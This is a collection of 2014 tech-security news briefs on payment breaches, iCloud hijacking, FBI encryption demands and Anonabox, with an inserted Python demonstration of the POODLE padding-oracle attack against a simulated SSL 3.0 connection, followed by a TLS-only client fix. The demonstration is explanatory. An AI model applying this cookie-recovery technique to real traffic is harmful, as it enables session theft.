System blocking Google, Apple efforts; allows others to pass through
CVS has ceased accepting Near-Field Communication (NFC) payments from Apple Pay and Google Wallet at its stores, US-wide. The pharmacy issued the instructions to stores earlier this week, with shutdowns continuing through the weekend. CVS has mirrored Rite Aid, which shut down its terminals earlier this week. Both CVS and Rite Aid are about to join the nascent and poorly-regarded MCX CurrentC NFC and barcode payment solution, and the move is widely seen as an effort to squeeze out both Google's and Apple's payment solutions.
CryptoWall 2.0 ransomware discovered being pushed by malicious advertisements
A new ransomware campaign is infecting victims through advertising networks on major sites, a report claims. Appearing on a number of high-profile websites, the malicious advertisements pushed the CryptoWall 2.0 ransomware using Flash exploits; once installed, it encrypts the victim's files and demands a fee to decrypt them before a payment deadline elapses.
Effort still in earliest stages
For Apple, getting Apple Pay working in China is a major priority, CEO Tim Cook tells China's state-run Xinhua news agency. "China is a really key market for us," he says. "Everything we do, we are going to work it here. Apple Pay is on the top of the list." He adds, however, that the company still has to learn the steps needed to bring Apple Pay to China, and has yet to meet with local banks, merchants, and carriers.
Unknown author calls Knox compromised, unsafe for use
Reports have begun to circulate about a pervasive flaw in Samsung's Knox security software for Android phones. The technology, which is the foundation of Android 5.0 Lollipop's enhanced protections, has come under fire by a lone, previously-unknown researcher, who calls the effort merely "security by obscurity."
Will use transport layer security for push notifications starting October 29
In a note to developers, Apple has announced that, due to a serious security flaw in SSL version 3.0 (the POODLE attack), the company will drop support for the protocol beginning Wednesday, October 29 for all of its push notifications, which are delivered through Apple's own servers. The company will require Transport Layer Security (TLS) for the service, and notes that developers whose push infrastructure does not already support TLS will need to add it to ensure uninterrupted push notification delivery.
CEO has already met with Vice Premier Ma Kai over China iCloud attacks
Apple CEO Tim Cook has posted a picture from his latest trip to China on Twitter, showing him sharing a laugh with a factory worker named Zhang Fan, who helps assemble the iPhone 6 at a factory in Zhengzhou. While Foxconn's factories manufacture equipment for a wide variety of technology firms including Google, Microsoft and others, Cook is the only CEO to routinely visit the facilities and personally investigate conditions and safety at the plants. He called the meeting with Zhang "an early highlight" of the trip.
Comey seeking update to CALEA to give law enforcement a 'front door' into devices
Federal Bureau of Investigation (FBI) Director James Comey isn't giving up his crusade to persuade the government and businesses that law enforcement should have access to encrypted phone data. Comey took his fight to Congress recently, asking that it update the Communications Assistance for Law Enforcement Act (CALEA) to cover newer technologies.
Mac will have to wait for key features
Avast Software has launched Avast 2015, an update of its multi-platform security suite. The main addition this year is a tool called Home Network Security, which scans a local network for potential vulnerabilities. These may include things like weak or default router passwords, unprotected IPv6 use, and already-compromised Internet connections. A related new feature is called SecureDNS, which offers encrypted traffic between a computer and an Avast-operated DNS server, reducing the chance of DNS hijacking.
Chinese government so far denying involvement
Apple CEO Tim Cook met with China's Vice Premier Ma Kai in Beijing on Wednesday to discuss man-in-the-middle attacks against iCloud users, according to Reuters and China's state-run Xinhua news agency. Reuters notes that the Chinese government has so far denied allegations of involvement, which in particular tied the attacks to the state firewall used to censor Internet access in the country. As for the meeting, Xinhua says only that the pair shared views on "protection of users' information" and "strengthening cooperation in information and communication fields."
Involvement of Chinese government uncertain
Apple is aware of "intermittent organized network attacks" against people trying to sign into iCloud.com, says Dow Jones. It insists, however, that iCloud servers haven't been breached, and that people using iOS or the latest version of OS X -- Yosemite -- should be unaffected. The company doesn't specifically mention China, which is where the browser hijacks are taking place.
USB tokens with FIDO U2F support can be used to secure Google accounts
Google is giving users of its services an extra security option, on top of its existing procedures and protocols, with a physical token. The search company's "Security Key" lets users register a USB token that supports the FIDO U2F standard; once enrolled, plugging the key into the computer's USB port and tapping it completes the second step of two-step verification in place of a code sent to a phone. Because the key signs a challenge bound to the site's origin, a lookalike phishing site cannot replay the response.
Unknown number of victims, data taken from PA, NY, NJ
Office supply store Staples appears to be the latest victim of a breach of customer payment information. The company issued a brief statement saying that they were looking into the matter, after several banks reported fraudulent activity with a pattern pointing to the source being Staples stores in the northeastern US.
Emphasizes user privacy through short-lived session IDs
While it may sound like a report from the Department of the Obvious, the new version of Spotlight included in Yosemite includes searching beyond the local drive, and consequently gathers and sends to Apple some information on what users are searching for, their (city-level) location -- if Location Services is turned on -- and what Spotlight Suggestion was selected. That one needs to get certain data to perform a web search has apparently come as a surprise to some, and thus Apple has released a statement clarifying exactly what data is gathered, how it is used, and reminding users of how to turn it off if desired.
Functions raise privacy concerns
The Yosemite version of Spotlight is automatically uploading both location and search data to Apple whenever the tool is used, reports say. The information is mentioned in an official "About Spotlight & Privacy" document, but may be missed by the average person. "If you have Location Services on your device turned on, when you make a search query to Spotlight the location of your device at that time will be sent to Apple," one part of the document reads.
Initiative adds EMV support to government channels, more identity theft protections, reporting
Last week US President Barack Obama signed an executive order that will help consumers who are victims of identity theft, as well as speed up the adoption of the Europay, MasterCard, and Visa (EMV) chip standard for credit and debit cards. Under the order, parts of the federal government will adopt EMV measures, and the public's ability to monitor financial health or seek help when necessary will be strengthened.
Users being redirected to dummy sites
China's state firewall is currently hijacking attempts to visit iCloud.com or Microsoft's login gateway, login.live.com, redirecting people to dummy websites, reports say. People visiting iCloud.com through Firefox or Chrome will see a certificate warning page, because the impostor site cannot present a certificate for icloud.com signed by a trusted authority; visitors using Qihoo's browser -- the most popular browser in China -- are being forwarded directly to the dummy site with no obvious sign that it isn't Apple's. It's believed that the Chinese government may be trying to harvest iCloud and Microsoft logins.
Zwipe, MasterCard team up to combine fingerprint authentication, contactless payments
At a press event last week, MasterCard and Zwipe announced a new type of payment card dubbed the Zwipe MasterCard. Where the new card differs from a standard credit or debit card is in the payment process, which relies on biometrics to approve purchases. The Zwipe MasterCard authenticates the cardholder by fingerprint at MasterCard contactless payment terminals, while retaining the Europay, MasterCard and Visa (EMV) chip on the card.
Hardware appeared to be sourced from Alibaba, software straight OpenWRT
Following allegations casting doubt on the project, the Tor-based Anonabox Kickstarter project has been terminated. Since the launch of the security-minded Anonabox, and the nearly instant completion of its funding goals, commenters and other figures questioned the source of the hardware and the actual security of the device, and criticized the lack of the promised, complete open-sourcing of the code.
Wi-Fi sync starts automatically once iOS devices are in range
AgileBits has released v5.0 of its password and credit card manager for the Mac, 1Password. The software has been redesigned to match the look of OS X Yosemite, including support for the OS' new dark mode. AgileBits is also taking advantage of changes to iCloud for "faster and more robust syncing;" the company warns, though, that iCloud sync now requires v5.0 on both iOS and OS X.
Encryption of smartphones hampers security efforts, claims FBI head
The head of the Federal Bureau of Investigation (FBI) has asked companies to back away from encrypting consumer devices by default. Echoing similar comments made last month, Director James Comey spoke to the Brookings Institution yesterday about the issue, which he claims will make it difficult for law enforcement officials to collect evidence from mobile devices.
Microsoft Office for Mac 2011 receives security update
Microsoft has released a security update for its Office for Mac 2011 software, bringing it to v14.4.5. The update resolves vulnerabilities that could allow remote code execution if a specially crafted file is opened in an affected version. A successful attacker would gain the same rights as the current user, and could then install programs; view, change or delete data; or create new accounts with full user rights. Full details can be found in Microsoft's latest security bulletin on the matter.
Reddit users suggest Anonabox created from existing routers sold in China
A Kickstarter campaign for a privacy-focused Wi-Fi router has drawn the ire of some Internet users, with the suggestion that all may not be as it seems. Reddit users are complaining about the Anonabox Tor router's claimed "open hardware," with components apparently being sourced from Chinese resellers rather than being designed specifically for the project.
Apple pitching tech to advertisers as an alternative to cookies
Something quietly introduced alongside iOS 8 has been the ability for advertisers to retarget iAds based on in-app browsing actions, a new report says. Apple is, in fact, said to be pitching this to advertisers as a way of circumventing the absence of mobile cookie tracking in iOS. In a given example, someone who adds a pair of shoes to a cart in a retailer's iPhone shopping app -- but decides not to buy them -- may later see an ad for that same pair of shoes from the same retailer, even in another app on his or her iPad. Tapping that ad might redirect the person to their abandoned checkout page and add the shoes back to it.
SSL 3.0 design flaw allows attackers to view contents of encrypted web traffic
Another Secure Sockets Layer (SSL) vulnerability has been disclosed by Google, just six months after the Heartbleed bug in OpenSSL. Padding Oracle On Downgraded Legacy Encryption ("POODLE") is a design flaw in SSL 3.0 itself rather than an implementation bug: the CBC padding is not covered by the MAC and only its final length byte is checked, so an attacker who can observe and tamper with traffic can use the server's accept-or-reject response as an oracle and recover roughly one byte of plaintext (a session cookie, say) per 256 attempts. Because browsers fall back to SSL 3.0 when a newer handshake fails, the attacker can also force the downgrade. Researchers say the issue is less severe than Heartbleed, despite potentially affecting nearly all browsers and a large number of servers.
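The following is an added illustration, not code from Google's paper or from any of the reports above. It models the SSL 3.0 record layer (MAC-then-encrypt, CBC, filler padding that is not checked, a single length byte that is) and runs the POODLE block swap against it: the attacker replaces the all-padding last block with the block holding the target byte and watches whether the record is accepted. It closes with the client-side fix Apple's push-notification note asks developers for, a context that will not negotiate SSL 3.0. Assumptions: a toy keyed permutation stands in for AES so the example needs no third-party library (POODLE depends only on CBC chaining, not on the block cipher); HMAC-SHA1 stands in for the SSL 3.0 MAC; and the cookie value is constructed.

```python
import hashlib
import hmac
import os
import random
import ssl

BLOCK = 16    # CBC block size, as for the AES suites in SSL 3.0
MAC_LEN = 20  # SHA-1 MAC length
ROUNDS = 4


class ToyBlockCipher:
    """Keyed 16-byte permutation standing in for AES (assumption, NOT secure).
    The attack below only needs CBC chaining; the cipher underneath is irrelevant."""

    def __init__(self, key: bytes):
        rng = random.Random(int.from_bytes(hashlib.sha256(b"sbox" + key).digest(), "big"))
        self.sbox = list(range(256))
        rng.shuffle(self.sbox)
        self.inv_sbox = [0] * 256
        for i, v in enumerate(self.sbox):
            self.inv_sbox[v] = i
        self.round_keys = [hashlib.sha256(key + bytes([r])).digest()[:BLOCK] for r in range(ROUNDS)]

    def encrypt_block(self, block: bytes) -> bytes:
        x = list(block)
        for rk in self.round_keys:
            x = [self.sbox[b ^ k] for b, k in zip(x, rk)]  # key mixing + substitution
            for i in range(1, BLOCK):                       # left-to-right XOR chain (diffusion)
                x[i] ^= x[i - 1]
            x = x[5:] + x[:5]                               # byte rotation
        return bytes(x)

    def decrypt_block(self, block: bytes) -> bytes:
        x = list(block)
        for rk in reversed(self.round_keys):                # exact inverse of encrypt_block
            x = x[-5:] + x[:-5]
            for i in range(BLOCK - 1, 0, -1):
                x[i] ^= x[i - 1]
            x = [self.inv_sbox[b] ^ k for b, k in zip(x, rk)]
        return bytes(x)


def cbc_encrypt(cipher, iv: bytes, data: bytes) -> bytes:
    out, prev = [], iv
    for i in range(0, len(data), BLOCK):
        prev = cipher.encrypt_block(bytes(a ^ b for a, b in zip(data[i:i + BLOCK], prev)))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(cipher, iv: bytes, data: bytes) -> bytes:
    out, prev = [], iv
    for i in range(0, len(data), BLOCK):
        blk = data[i:i + BLOCK]
        out.append(bytes(a ^ b for a, b in zip(cipher.decrypt_block(blk), prev)))
        prev = blk
    return b"".join(out)


class Sslv3Connection:
    """SSL 3.0 record protection: payload || MAC || filler || length byte, then CBC.
    The filler bytes are unspecified by the protocol, so the receiver checks only
    the length byte. HMAC-SHA1 is an assumption standing in for the SSL 3.0 MAC."""

    def __init__(self):
        self.cipher = ToyBlockCipher(os.urandom(16))
        self.mac_key = os.urandom(20)

    def seal(self, payload: bytes):
        body = payload + hmac.new(self.mac_key, payload, hashlib.sha1).digest()
        pad_len = BLOCK - 1 - len(body) % BLOCK          # filler count; a length byte follows
        body += os.urandom(pad_len) + bytes([pad_len])   # aligned body => 15 filler + 0x0f (full block)
        iv = os.urandom(BLOCK)
        return iv, cbc_encrypt(self.cipher, iv, body)

    def unseal(self, iv: bytes, ct: bytes) -> bool:
        """Server side: True if the record is accepted. Only pt[-1] is inspected."""
        pt = cbc_decrypt(self.cipher, iv, ct)
        pad_len = pt[-1]
        if pad_len >= BLOCK:
            return False
        body = pt[:len(pt) - pad_len - 1]
        if len(body) < MAC_LEN:
            return False
        payload, mac = body[:-MAC_LEN], body[-MAC_LEN:]
        return hmac.compare_digest(mac, hmac.new(self.mac_key, payload, hashlib.sha1).digest())


SECRET = b"sid=9c3a"  # constructed stand-in for the cookie the browser re-sends every request


def victim_request(conn: Sslv3Connection, prefix_len: int, suffix_len: int):
    """The browser re-sends the cookie; attacker script chooses URL length (prefix)
    and body length (suffix) around it, exactly as in the real attack."""
    return conn.seal(b"A" * prefix_len + SECRET + b"B" * suffix_len)


def poodle_recover(conn: Sslv3Connection, secret_len: int) -> bytes:
    """Network attacker: one plaintext byte per ~256 accept/reject observations."""
    recovered = bytearray()
    for k in range(secret_len):
        prefix = BLOCK + (BLOCK - 1 - k) % BLOCK           # SECRET[k] lands on byte 15 of block t >= 1
        suffix = -(prefix + secret_len + MAC_LEN) % BLOCK  # payload+MAC fill whole blocks => full padding block
        t = (prefix + k) // BLOCK
        while True:
            iv, ct = victim_request(conn, prefix, suffix)
            blocks = [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
            c_before_target, c_before_last = blocks[t - 1], blocks[-2]
            blocks[-1] = blocks[t]                         # padding block replaced by the target block
            if conn.unseal(iv, b"".join(blocks)):
                # Accepted iff (P_t[15] ^ C_{t-1}[15] ^ C_{n-1}[15]) == 15; MAC still matches
                # because the original payload+MAC blocks were left untouched.
                recovered.append((BLOCK - 1) ^ c_before_target[-1] ^ c_before_last[-1])
                break
    return bytes(recovered)


def no_sslv3_client_context() -> ssl.SSLContext:
    """The fix for clients: never negotiate SSL 3.0. TLS 1.0 was the 2014 floor;
    a current client should start at TLS 1.2 (older Pythons: ctx.options |= ssl.OP_NO_SSLv3)."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx
```

Running `poodle_recover(Sslv3Connection(), len(SECRET))` returns the cookie after roughly 256 forged records per byte; the only signal used is whether the server accepted the record, which is exactly what an on-path attacker sees in the real protocol. Note why the swap works: the attacker never needs to decrypt the MAC block, because a decrypted last byte of 15 strips the whole substituted block and leaves the genuine payload and MAC intact.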
Kickstarter campaign for Anonabox vastly exceeds target in first day
Welcome to another edition of Crowdfunding Critic, an article series where the staff of MacNN and Electronista will highlight a new crowdfunded project from sites such as Kickstarter and Indiegogo, with this edition focusing on the popular Anonabox. As always, we are not endorsing a project or warning of any potential funding risks associated with crowdfunded projects, so it is advisable to do your own research before investing.
Third party services likely to blame for Dropbox account leak
Passwords from a supposed pool of 7 million Dropbox accounts have allegedly been leaked by hackers, though Dropbox denies its service has been hacked. A thread on Reddit linked to batches of account credentials, with the poster hoping to receive Bitcoin donations for the leaks, though the exact source of the leaked account details is unknown.
Kmart offering identity theft protection, credit monitoring
Sears-owned retailer Kmart has declared that it has suffered a massive data breach. The company said late Friday that a malware attack that began harvesting data from its point-of-sale computer systems in early September involved a "new form of malware" that was "similar to a computer virus." Few details have been released by Kmart, but the company warns that the breach could include every in-store shopper between September 1 and Thursday, October 9. Online shoppers were not impacted.
August infection subjects customers of 395 stores to data theft
Restaurant chain Dairy Queen has confirmed that 395 of its 4,500 US locations were affected by the "Backoff" point-of-sale malware, which in turn compromised customers' credit card information. Restaurants in 46 states were affected, with customers in Hawaii, Louisiana, Rhode Island and Vermont escaping the malware.
Breach from either Android app or third party web tool SnapSaved
Some supposedly ephemeral messages sent through the Snapchat service have been leaked to the Internet. Private photos collected for years through either the Snapchat-archiving Android app Snapsave or the shuttered Snapchat web client SnapSaved have been stolen, and posted en masse to the chat forum 4chan and other similar locations.
Two publicly traded companies will emerge in areas of security, information management
Rumors of Symantec's possible company split look to be true, as the company announced today that a plan was voted on to break the company up. The company, which is known for its line of Norton security products, said that its board of directors unanimously approved a new plan that would create two publicly traded companies, each with their own focus.
Information on ePubs sent in plain text over unencrypted channels to Adobe servers
If Adobe didn't have enough problems with its security reputation because of how often its products serve as attack vectors, the claim that the company collects detailed, personal data through Digital Editions 4 will undoubtedly further alienate some customers. The program, which is used to enforce digital rights management on borrowed books from libraries or other online avenues, reports details on the use of ePub files back to Adobe, and does so in plain text over an unencrypted connection, so anyone on the network path can read the same data, inviting further privacy and security issues.
List of affected Belkin devices, cause of incident both unknown
Some of accessory manufacturer Belkin's router customers are experiencing connectivity issues, predominantly with older models. For reasons unknown, possibly due to a silent, automatic firmware update, some Belkin networking products are refusing connections to the Internet while maintaining local area network connectivity. Some models can be restored by pointing the router's DNS settings at Google's public resolvers or another provider's.
Letter to Vermont attorney general advises of August intrusion
AT&T has admitted that it has suffered a data breach, and is warning customers about the intrusion. The communications provider has written to the Vermont attorney general about the breach, which took place in August; unlike similar breaches at Home Depot, Target, and an earlier incident at AT&T itself, this one was carried out by an employee rather than an outside attacker.
Latest 1Password improves Touch ID support, adds iPhone 6 Plus support
A new version of password manager 1Password has been released for the iPhone and iPad, offering support for the iPhone 6 and iPhone 6 Plus in the form of 3x higher resolution images and improved icons. The update also makes Touch ID support more reliable, and simplifies the app's security settings. A new option has been added to disable third-party keyboards inside the 1Password app (since such a keyboard could, in principle, transmit keystrokes to its developer), and users can now create tags to help sort data. The app itself is free, but a "pro" in-app purchase to unlock additional features costs $10.
Should halt further infections
Apple has issued a silent update to XProtect, the anti-malware system in OS X, to detect and block the inaccurately-named "iWorm" trojan uncovered last week. The new definitions actually mention three variants, identified as "OSX.iWorm.A," "OSX.iWorm.B," and "OSX.iWorm.C." It's not clear what the differences between them might be.
Search engine has scrubbed 'tens of thousands' of links to stolen photos
Google has responded to the letter threatening legal action should Google not purge the Internet of stolen, and sometimes intimate, photos of celebrities. The search engine has denied that it is intentionally profiting on the scandal, and instead has acted quickly and appropriately to takedown requests by removing "tens of thousands" of images from Google search results.
Scope of theft makes consumer protection agencies wary of uptick in phishing
Despite JPMorgan Chase claiming that it isn't seeing unusual fraud activity, two states have launched an investigation of the breach that exposed 76 million households' information, with the promise of more to come. A recent regulatory filing disclosed the leak, with customers' names, addresses, phone numbers, and email addresses stolen; the bank, however, says no financial information was taken.
iOS and 'free-to-play' game blamed
A 15-year-old from Antwerp, Belgium has managed to accumulate over 37,000 euro ($46,000) in iTunes charges on a credit card through in-app purchases, according to local publication Nieuwsblad. The teenager was reportedly playing a free-to-play iOS game called Game of War: Fire Age; several months in, his mother asked him to buy some e-books using her credit card. The boy then discovered he could buy virtual gold in-game using real money, greatly accelerating his progress. The title even has a casino minigame.
Formerly used Reddit as a go-between to steal user data
[Updated with corrected information and further details] A new Trojan threat, possibly disguised as a fake unauthorized build of OS X 10.10 Yosemite, is making the rounds by taking in users who attempt to pirate software. The new malware, dubbed "iWorm" by Russian research firm "Dr. Web," has supposedly been installed by duped users on over 17,000 unique IP addresses worldwide thus far. Users would have had to have downloaded and installed the software in order to be victimized by the Trojan, which is mostly aimed at gathering user data.
Google chairman defends company against implied Tim Cook remarks
Google chairman Eric Schmidt has fought back against comments over the company's security and privacy, following comments laid out by Apple CEO Tim Cook. In an interview which touched upon a recent open letter about privacy from Cook, Schmidt claims "Someone didn't brief [Cook] correctly on Google's policies. It's unfortunate for him."
Number of people affected revealed more than three months after breach discovered
A filing made with the United States Securities and Exchange Commission (SEC) Thursday revealed new information on the scope of the breach that JPMorgan Chase witnessed earlier in the summer. In July the company, along with at least four other financial institutions, discovered an attack by hackers that reportedly resulted in gigabytes of data stolen after they gained high-level access to 90 of JPMorgan Chase's servers worldwide.
Tests reveal keylogger information unencrypted when sent, 'software is unreliable'
A program that is touted as the first step in Internet security for children was examined by the Electronic Frontier Foundation (EFF), only to discover that the software isn't very safe itself. ComputerCop, which the EFF says is distributed by approximately 245 agencies involved in law enforcement in 35 states, is nothing more than branded spyware that is unreliable and sends unencrypted key logs, the foundation says.
Proposals for Facebook research to undergo more stringent reviews
Facebook has admitted fault over its handling of user-based research, a matter which erupted this summer, and is taking steps to prevent such incidents from happening again. The social network is putting in place measures that it hopes will place a greater degree of scrutiny on future research projects, at the time of proposal, and at the time of publication.
Pair of researchers engineer hack, post code to shame vendors into action
Security researchers Adam Caudill and Brandon Wilson have published source code for "BadUSB," an attack that reprograms the firmware of a USB device's controller so the device can present itself to the host as something else, a keyboard for example; because the weakness sits in how controllers accept firmware, the class of attack is considered theoretically unpatchable. First revealed at the Black Hat security conference in July, the attack was reverse-engineered from the original finding by the pair, who say they published for the public good and "so people can defend against it." More severe exploits are possible using their method, but Caudill and Wilson are hesitant to release them for fear of misuse.
Google+ now offering ability to restrict viewers based on age, location
Google's social network, Google+, has added a new privacy feature, allowing its users to limit who views their content based on age and location. The new section, found within Profile Settings, is called Audience; here, an age limit can be selected on content viewing, and users can also select what countries the content can be viewed from. Varying age restrictions can be chosen for each country if desired.
Malware entry vector not yet identified; may capitalize on jailbreak compromise
In an almost unheard-of claim, Lacoon Mobile Security has said that it has discovered a new spyware attack that targets both iOS and Android devices and which appears to be aimed specifically at Hong Kong pro-democracy protesters. Lacoon says it made the discovery while investigating the Android version, but did not clarify how the malware might be installed, or overcome the security built into iOS that has, thus far, kept it largely immune to serious malware or viruses.
Users can enter IMEI to learn more; technology is on by default in iOS 8
Users who are unsure whether their iOS device has the anti-theft feature Activation Lock turned on can now easily check through a new page on Apple's iCloud site. While the page is currently not linked from the main menu on iCloud.com -- suggesting it may still be undergoing testing -- it lets users enter the device's serial number or IMEI identifier and returns whether the device is protected.
New $15,000 award for successful submissions, up from $5,000.
Google is increasing the rewards in its bug bounties program, as it tries to make its software more secure. The search company is updating its reward pricing range to between $500 and $15,000 per bug, up from the previous maximum of $5,000 for a high-quality report, with an increased focus on discovering potential vulnerabilities within the Chrome browser.
Newest range of grocery store breaches spans 20 states
Supervalu and Albertson's shoppers may be in for another round of personal information theft notifications. The companies said that a second hack took place in late August or early September, with the company finding malicious software on systems that process credit and debit card sales at some of the company's 1,081 stores. Additionally, the malware was also found at Shoppers Food and Pharmacy, plus Shop 'n Save stores -- but the company believes that the installation was not successful, and failed to capture payment data.
Dueling regulatory boards fight over future of ISP regulation
Allegedly concerned about protecting the American consumer, US Federal Trade Commission (FTC) head Maureen Ohlhausen has come out as strongly against Federal Communications Commission (FCC) Chairman Tom Wheeler's net neutrality provision -- specifically, the possibility of Title II regulation of ISPs. The comment against the possibility of regulating Internet providers as a utility is the FTC's second in September.